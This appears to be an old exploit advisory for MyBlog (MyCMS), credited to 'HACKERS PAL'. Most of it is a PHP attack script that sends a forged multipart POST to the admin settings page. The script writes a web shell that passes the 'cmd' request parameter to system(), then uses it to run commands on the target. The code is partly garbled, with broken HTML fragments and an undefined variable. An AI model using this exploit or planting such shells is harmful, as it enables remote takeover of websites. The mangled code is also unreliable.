|
Hello,,=0D
=0D
MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..=0D
=0D
http://sourceforge.net/projects/myblog/=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D
Email Address : security@soqor.net=0D
=0D
Exploit : -=0D
#!/usr/bin/php -q -d short_open_tag=on=0D
=0D
/*=0D
/* MyCMS Command Execution=0D
/* This exploit should allow you to execute commands=0D
/* By : HACKERS PAL=0D
/* WwW.SoQoR.NeT=0D
*/=0D
echo('=0D
/**********************************************/=0D
/* MyCmS Command Execution */=0D
/* by HACKERS PAL
=0D">href=\"http://www.soqor.net\">WwW.SoQoR.NeT
=0D
";=0D
$cmd=($_GET[cmd])?$_GET[cmd]:$_POST[cmd];=0D
system($cmd);=0D
die();=0D
?>';=0D
=0D
add_data("","");=0D
add_data("content",$contents);=0D
add_data('','',"init");=0D
=0D
$packet="POST ".$p."admin/settings.php HTTP/1.0\r\n";=0D
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";=0D
$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";=0D
$packet.="Accept-Language: it\r\n";=0D
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";=0D
$packet.="Accept-Encoding: gzip, deflate\r\n";=0D
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";=0D
$packet.="Host: ".$host."\r\n";=0D
$packet.="Content-Length: ".strlen($data)."\r\n";=0D
$packet.="Connection: Close\r\n";=0D
$packet.="Cache-Control: no-cache\r\n";=0D
$packet.="Cookie: ".$cookie."\r\n\r\n";=0D
$packet.=$data;=0D
connect($packet);=0D
=0D
=0D
if (eregi("Main Blog Settings",$html))=0D
{=0D
echo "\n[+] Successfully uploaded ...\n[+] Go To http://".$p."index.php?cmd=$cmd for your own commands.. \n[+] The Result Of The Command\n";=0D
Echo get_page($p."index.php?cmd=".$cmd);=0D
}=0D
else=0D
{=0D
echo "\n[-] Unable to Upload File\n[-] Exploit Failed";=0D
}=0D
echo ("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D
?>=0D
=0D
#WwW.SoQoR.NeT